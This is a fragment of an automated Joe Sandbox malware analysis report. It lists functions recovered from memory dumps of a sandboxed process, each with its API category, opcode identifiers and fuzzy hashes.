                                                                                                                                                  • Instruction ID: 3bdb857254b1de50ff1535007e479ee4f3c095df76a64024fdec2e36f6215506
                                                                                                                                                  • Opcode Fuzzy Hash: 89563af4fe1d572c43706a2c5b782feb3df9d02bfd1ff06021ce1d81ad062eb6
                                                                                                                                                  • Instruction Fuzzy Hash: DC21E539608645C7DB5CAB3CD4B46B6B3F1FF94300F14493AE84BC7B85D668F8818296
                                                                                                                                                  Function 00007DF4839B1740 Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2986531897.00007DF4839B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4839B1000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_7df4839b1000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                  • Opcode ID: 008c1c100189bfc35651791388f787f69f2d51d68de1c2a05aeaf1d2b03de7f2
                                                                                                                                                  • Instruction ID: a795c7f99f8e0419f03b3ae6b2bf412fa26253382408e1264f8fd4ce7beceaea
                                                                                                                                                  • Opcode Fuzzy Hash: 008c1c100189bfc35651791388f787f69f2d51d68de1c2a05aeaf1d2b03de7f2
                                                                                                                                                  • Instruction Fuzzy Hash: F121E2316086E547EB189B2DD4E4677B3F5FF94700F2409BAE44FC7385E668E8818285
                                                                                                                                                  Function 00007DF4839E1740 Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2986967644.00007DF4839E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4839E1000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_7df4839e1000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                  • Opcode ID: 79a23d149b39818e3e43e8007e45963aa9a0f0bf87d1b18fa9329f731b042926
                                                                                                                                                  • Instruction ID: 9f6e3f2508bf0a946abf7bbc42e2e40e6fff283b50bfa7ab0dbe3ee411919b55
                                                                                                                                                  • Opcode Fuzzy Hash: 79a23d149b39818e3e43e8007e45963aa9a0f0bf87d1b18fa9329f731b042926
                                                                                                                                                  • Instruction Fuzzy Hash: C721E535D086C547EB989B2CD4A4677B3F1FF94B00F140A2AE44BC7385E6AAE881D245
                                                                                                                                                  Function 000001716185A9D4 Relevance: 2.5, APIs: 2, Instructions: 42COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                  • Opcode ID: f3ea22a6fa7cbad43c7f75ab5131f91595a366188be7b26cc18e59d3410828da
                                                                                                                                                  • Instruction ID: 16e828cecce50ef84ccb6df42c8d15c9e81552ed5e3c80eeab32939909cf4a8a
                                                                                                                                                  • Opcode Fuzzy Hash: f3ea22a6fa7cbad43c7f75ab5131f91595a366188be7b26cc18e59d3410828da
                                                                                                                                                  • Instruction Fuzzy Hash: EDF06770214E0A9FEBC9EF1DC0D97A073F8FB68306F600029A00AC25A4D7B08C94CB12
                                                                                                                                                  Function 00007DF483A015E8 Relevance: 1.7, APIs: 1, Instructions: 228COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000003.2800458716.00007DF483A01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF483A01000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_3_7df483a01000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileMappingOpen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1680863896-0
                                                                                                                                                  • Opcode ID: a4d7378eb0dc183d45dac9fde789c38604b4b9a60361aa9a1ccba498305d516d
                                                                                                                                                  • Instruction ID: 8e0424a3aea6a6aee64a459a48fcdc875f2ede308bea9feca0aadfe717e67c6c
                                                                                                                                                  • Opcode Fuzzy Hash: a4d7378eb0dc183d45dac9fde789c38604b4b9a60361aa9a1ccba498305d516d
                                                                                                                                                  • Instruction Fuzzy Hash: 6471567061C7858FD765EF29D4A57BBB7E1FB94300F00493EE58FC2251EA34A5458782
                                                                                                                                                  Function 000001716185CC9C Relevance: 1.7, APIs: 1, Instructions: 228fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                  • Opcode ID: f573dec0403348014450f7ba306745c6dd418323538c19bace6ad6f3c15519fa
                                                                                                                                                  • Instruction ID: 08f61e1307e7e8bb5d6b3a760b7dfe46da053e070ca51d0bcbcd8d49a8846ad0
                                                                                                                                                  • Opcode Fuzzy Hash: f573dec0403348014450f7ba306745c6dd418323538c19bace6ad6f3c15519fa
                                                                                                                                                  • Instruction Fuzzy Hash: F271B53120CB045FE799DB1CD882AA573F9FB95B10F10061DE48FC3196DBB4E9469B86
                                                                                                                                                  Function 0000017161856C68 Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                  • Opcode ID: f5a0fb9eb97d8a0cea1a0077705b63a589f7aa8c555666e722ed38cdf1e7e3b3
                                                                                                                                                  • Instruction ID: d11e3aff18df15d3d913b6323a4f41d58cafa5d03407c4a59e9be7359138b544
                                                                                                                                                  • Opcode Fuzzy Hash: f5a0fb9eb97d8a0cea1a0077705b63a589f7aa8c555666e722ed38cdf1e7e3b3
                                                                                                                                                  • Instruction Fuzzy Hash: A841CB30218A482BEBD9F73CD8937FA73E9E794711F140A19B80EC31D6DE69D9059643
                                                                                                                                                  Function 00000171618577DC Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InformationVolume
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2039140958-0
                                                                                                                                                  • Opcode ID: ab88d9938b3b72962f423333e66c75964dea025bf306d4a69d18b2f71a512dba
                                                                                                                                                  • Instruction ID: 2458845222c81f66abd76f8913240229cbcf93495948fd5cb933312a6f6e45bb
                                                                                                                                                  • Opcode Fuzzy Hash: ab88d9938b3b72962f423333e66c75964dea025bf306d4a69d18b2f71a512dba
                                                                                                                                                  • Instruction Fuzzy Hash: B2410B7111C7488BE76AEB28C8957DBB3F5FB94300F404A1DB48AC2195EFB59605DB82
                                                                                                                                                  Function 00007DF4839E34A8 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2986967644.00007DF4839E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4839E1000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_7df4839e1000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: EventHook
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3661607649-0
                                                                                                                                                  • Opcode ID: 5a2bbfa698742b6cae5652eefc388705153c62446812716ece3234e1382db74d
                                                                                                                                                  • Instruction ID: ec05d7ef4fb31b1cc5740a7d18da33df86dacae41cecd132bdf8089b4202e061
                                                                                                                                                  • Opcode Fuzzy Hash: 5a2bbfa698742b6cae5652eefc388705153c62446812716ece3234e1382db74d
                                                                                                                                                  • Instruction Fuzzy Hash: 8A318E31918A898FEB55EB25C4A997B73B0FF65310F100A3AE04FC6691DB78A881CB41
                                                                                                                                                  Function 000001716185CEE0 Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                  • Opcode ID: 692895d7e566b00515affad7a4510cba5330249c96600c383c0354dec883b266
                                                                                                                                                  • Instruction ID: 3ab9137e3890a8876e182a8ac8b0268301aa0c266b889143628b68211fa45a65
                                                                                                                                                  • Opcode Fuzzy Hash: 692895d7e566b00515affad7a4510cba5330249c96600c383c0354dec883b266
                                                                                                                                                  • Instruction Fuzzy Hash: 2801C471208A0C9FDB81EF18D8C19ADB3E9FBD8300F50062AF84EC2150DB70DA158B82
                                                                                                                                                  Function 0000017161852908 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                  • Opcode ID: eb8efb70a255d3993e3c222089937f44c28cf696e92b085bcc04ab88a5b55cd8
                                                                                                                                                  • Instruction ID: ad0d1d33e4f7c0cea72c70822425e8795393eb2dfcd75f631bbbe63060961711
                                                                                                                                                  • Opcode Fuzzy Hash: eb8efb70a255d3993e3c222089937f44c28cf696e92b085bcc04ab88a5b55cd8
                                                                                                                                                  • Instruction Fuzzy Hash: CD0126317189199FEB94A73DDC88A6533F6FB8A352B444074E80EC3258DA39AC41CB81
                                                                                                                                                  Function 00007DF4839B3CDC Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2986531897.00007DF4839B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4839B1000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_7df4839b1000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: EventHook
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3661607649-0
                                                                                                                                                  • Opcode ID: 7e614b85896ac0b1141b176719915ed43944beda22e6c339024177dd55c03ccc
                                                                                                                                                  • Instruction ID: 7dccbbfa4dcb9fbe2fce7036990b0fd04158ad0a5b97f88c25bc57c800b56242
                                                                                                                                                  • Opcode Fuzzy Hash: 7e614b85896ac0b1141b176719915ed43944beda22e6c339024177dd55c03ccc
                                                                                                                                                  • Instruction Fuzzy Hash: 5C115B7181DAA59AEB54EB2088B57BA72B0FF94394F500A6DD04FC12D2DA3CB485CB41
                                                                                                                                                  Function 000001716185BEF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                  • Opcode ID: abc4bbe606b124008aec48ef764282d5b057ec30dc72963a0fbe36d295726b2e
                                                                                                                                                  • Instruction ID: 123b6a124ff1bbc5d9a1cfe317ff79c965ae738f3246e55db4abaa0fdc46349f
                                                                                                                                                  • Opcode Fuzzy Hash: abc4bbe606b124008aec48ef764282d5b057ec30dc72963a0fbe36d295726b2e
                                                                                                                                                  • Instruction Fuzzy Hash: 32014430618A4C5FF7C5EB3C88567BA36EAEBA4701F50857AB04EC32D9DA69C9049742
                                                                                                                                                  Function 0000017161852B54 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 10892065-0
                                                                                                                                                  • Opcode ID: 897fafeead847303cd79d11afed6f4c8d1267b1295cf91a495235683339b4e9f
                                                                                                                                                  • Instruction ID: c4ccd2c910318b3c2eee34891c5935ce01d3c2f24ad8465aaa21384b6f248c0a
                                                                                                                                                  • Opcode Fuzzy Hash: 897fafeead847303cd79d11afed6f4c8d1267b1295cf91a495235683339b4e9f
                                                                                                                                                  • Instruction Fuzzy Hash: 2BF0A77160CA05DBF794AF7E5C86295226BE344712F54493AA009C7184DDBD84416203
                                                                                                                                                  Function 00000171618569B8 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressCallerProc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2663294120-0
                                                                                                                                                  • Opcode ID: d995070f4c000868ee4da6d9934e01647bf6d928269a01321783332ab5c3360a
                                                                                                                                                  • Instruction ID: dc0ac3bb7b5caec9baf53ef5d5980f3f8eb99c6b6029add4f14e44f9d5878b43
                                                                                                                                                  • Opcode Fuzzy Hash: d995070f4c000868ee4da6d9934e01647bf6d928269a01321783332ab5c3360a
                                                                                                                                                  • Instruction Fuzzy Hash: 40E0C221B08C191BABB861AE248D6B695DAC7DC272714027BF81DC3299ED90CC814391
                                                                                                                                                  Function 00007DF483A01290 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2987398812.00007DF483A01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF483A01000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_7df483a01000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FunctionTable
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1252446317-0
                                                                                                                                                  • Opcode ID: cff89ce48d21670ef986fb34dbe231ab83686b2b911df37c38ad495f9c0b2048
                                                                                                                                                  • Instruction ID: d8dce73866676cc035299148e4076b8fdbd83b9c17450a1280262a528db134fb
                                                                                                                                                  • Opcode Fuzzy Hash: cff89ce48d21670ef986fb34dbe231ab83686b2b911df37c38ad495f9c0b2048
                                                                                                                                                  • Instruction Fuzzy Hash: 12E04F349049058BEB9CE71DC8197A036E0FB5C306F608679D505C9291CB3998DBCF81
                                                                                                                                                  Function 00007DF483A01290 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000003.2800458716.00007DF483A01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF483A01000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_3_7df483a01000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FunctionTable
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1252446317-0
                                                                                                                                                  • Opcode ID: fc492990cf9c193ed0fed28dab1318ef1c2e9243cee28bd6a774944ac56baf31
                                                                                                                                                  • Instruction ID: 0ddb4d17ab0ba5b4d57347278695c243276930ab62e8f3d53c6e900e4961eab6
                                                                                                                                                  • Opcode Fuzzy Hash: fc492990cf9c193ed0fed28dab1318ef1c2e9243cee28bd6a774944ac56baf31
                                                                                                                                                  • Instruction Fuzzy Hash: E1E04F349049059BEB9CE71DC8197A03AE0FB5C30AF608669D505C9291CB7994DBCF81
                                                                                                                                                  Function 00007DF4839B1708 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2986531897.00007DF4839B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4839B1000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_7df4839b1000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FunctionTable
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1252446317-0
                                                                                                                                                  • Opcode ID: e917f39a39c33fe414eade99d1458f0d2d3e05fe92a720ed8b0375ca766d8558
                                                                                                                                                  • Instruction ID: edbdea77e5c2803b433d6ba1aeaf14a86a181c7ea1b10703fa38b21f9e1d3e3a
                                                                                                                                                  • Opcode Fuzzy Hash: e917f39a39c33fe414eade99d1458f0d2d3e05fe92a720ed8b0375ca766d8558
                                                                                                                                                  • Instruction Fuzzy Hash: D7E04F305009094BEB98D61DC8997A036E0EB58306F6042A9D405CA291DB3994DBCF81
                                                                                                                                                  Function 00007DF4839E1708 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2986967644.00007DF4839E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4839E1000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_7df4839e1000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FunctionTable
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1252446317-0
                                                                                                                                                  • Opcode ID: 18eb6388586fc4d6c2a3579563bef3692ffb62769f7eb08bbe6ffb4e199480d7
                                                                                                                                                  • Instruction ID: 3df445f33b8cd38dfafc3c971e5219241f25ad100f3bbbecc325d7075bba93a0
                                                                                                                                                  • Opcode Fuzzy Hash: 18eb6388586fc4d6c2a3579563bef3692ffb62769f7eb08bbe6ffb4e199480d7
                                                                                                                                                  • Instruction Fuzzy Hash: F5E04F305009054BEBA8D71DC8597613AE0FB58306F604269D405CA291DB7E94DBCF81
                                                                                                                                                  Function 00000171618574F0 Relevance: 1.5, APIs: 1, Instructions: 276COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                  • Opcode ID: 306f73362989c91bfaffd3666fa505f5868a1dafee964194c29bb12492c75fc6
                                                                                                                                                  • Instruction ID: 70c0441d8226d3b2fc38429de618cb6530b296031e25e6a34b4220b6844dedfa
                                                                                                                                                  • Opcode Fuzzy Hash: 306f73362989c91bfaffd3666fa505f5868a1dafee964194c29bb12492c75fc6
                                                                                                                                                  • Instruction Fuzzy Hash: 2C91613021CA099FEB85EF18D486BEA73F4FB54700F848559F44AC719ADE70E845CB82
                                                                                                                                                  Function 0000017161853C88 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FunctionTable
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1252446317-0
                                                                                                                                                  • Opcode ID: e973a519ee2ebc5e911fb478164db4f9dda36e27b6cb7c6046375041e7ff95af
                                                                                                                                                  • Instruction ID: 7fe1379cc3a45bd1abf8f036216f8a1704ef20070653148ce1561ce878962048
                                                                                                                                                  • Opcode Fuzzy Hash: e973a519ee2ebc5e911fb478164db4f9dda36e27b6cb7c6046375041e7ff95af
                                                                                                                                                  • Instruction Fuzzy Hash: 61E04F301009056BEFA8DB1DC84939036E0E798306FA08258E805C9295CB79CCABCF82
                                                                                                                                                  Function 000001716185698C Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                  • Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                                                  • Instruction ID: ed7da91d7f236fd02f54a3a90f5bacea458d85b19838954315255f294b7ffd8e
                                                                                                                                                  • Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                                                  • Instruction Fuzzy Hash: 27D0A720324D0D1BEA88A33D1C967A511EAE7CC321F54013AB80EC2289D994CC554301
                                                                                                                                                  Function 000001716185C994 Relevance: 1.5, APIs: 1, Instructions: 272COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                  • Opcode ID: 95e0b7105a60c66ccf3cf853b29ca3c02cf426d78340e81cc55da608d90ff99a
                                                                                                                                                  • Instruction ID: 1277941c8eeba21469eea4eaec0af46bbffa128c3007e93b2108afe6ef20ca5a
                                                                                                                                                  • Opcode Fuzzy Hash: 95e0b7105a60c66ccf3cf853b29ca3c02cf426d78340e81cc55da608d90ff99a
                                                                                                                                                  • Instruction Fuzzy Hash: 8B91437151CB485BD7A5EF18C8867EEB3F9FB94700F400A2EE08EC3196DA7499459B83
                                                                                                                                                  Function 000001716185A7E0 Relevance: 1.4, APIs: 1, Instructions: 139COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: malloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2803490479-0
                                                                                                                                                  • Opcode ID: 476d1573ced0e4e7d90478b065ffce6f5161857ad511bc77908c61c20efb894b
                                                                                                                                                  • Instruction ID: d0c2f7e776b1e58ae50f43a40e8e612e308a1ea1776c8e75dcedaa3e4d1c546f
                                                                                                                                                  • Opcode Fuzzy Hash: 476d1573ced0e4e7d90478b065ffce6f5161857ad511bc77908c61c20efb894b
                                                                                                                                                  • Instruction Fuzzy Hash: C1419431218D0E9FDBC4EF2CD889AA5B7F4FB68711710466AE40DC3668DB70E8858BC1
                                                                                                                                                  Function 000001716186DBCC Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                  • Opcode ID: 5fbeb56ece995088b76dd5c21d54cad8e0ac5a6ba9f78397ae3b26e7a6714c4d
                                                                                                                                                  • Instruction ID: 9328ea82d280066dd79d8e9efe4b65cbcd2cdd67c836ed4fb0b8b3991012d3d5
                                                                                                                                                  • Opcode Fuzzy Hash: 5fbeb56ece995088b76dd5c21d54cad8e0ac5a6ba9f78397ae3b26e7a6714c4d
                                                                                                                                                  • Instruction Fuzzy Hash: A411C0302089299FFF759F2D88857A432E4EB58716F24027AE84DCA289CBB08C40D7D2
                                                                                                                                                  Function 0000017161894C3C Relevance: 1.3, APIs: 1, Instructions: 42COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                  • Opcode ID: 5a17d2a82900e38e66e0587de357cfea25c88adc918405c2cab64094945da2f0
                                                                                                                                                  • Instruction ID: 5f836adc1c289c5186de0f478f1409bb86c55a62e01ac07b4bf407f431c45fbc
                                                                                                                                                  • Opcode Fuzzy Hash: 5a17d2a82900e38e66e0587de357cfea25c88adc918405c2cab64094945da2f0
                                                                                                                                                  • Instruction Fuzzy Hash: 33F0F070214D0A5FEF94EB6C84D5F2033EAFB98308F601254A82EC6295DB76CC82C740

                                                                                                                                                  Non-executed Functions

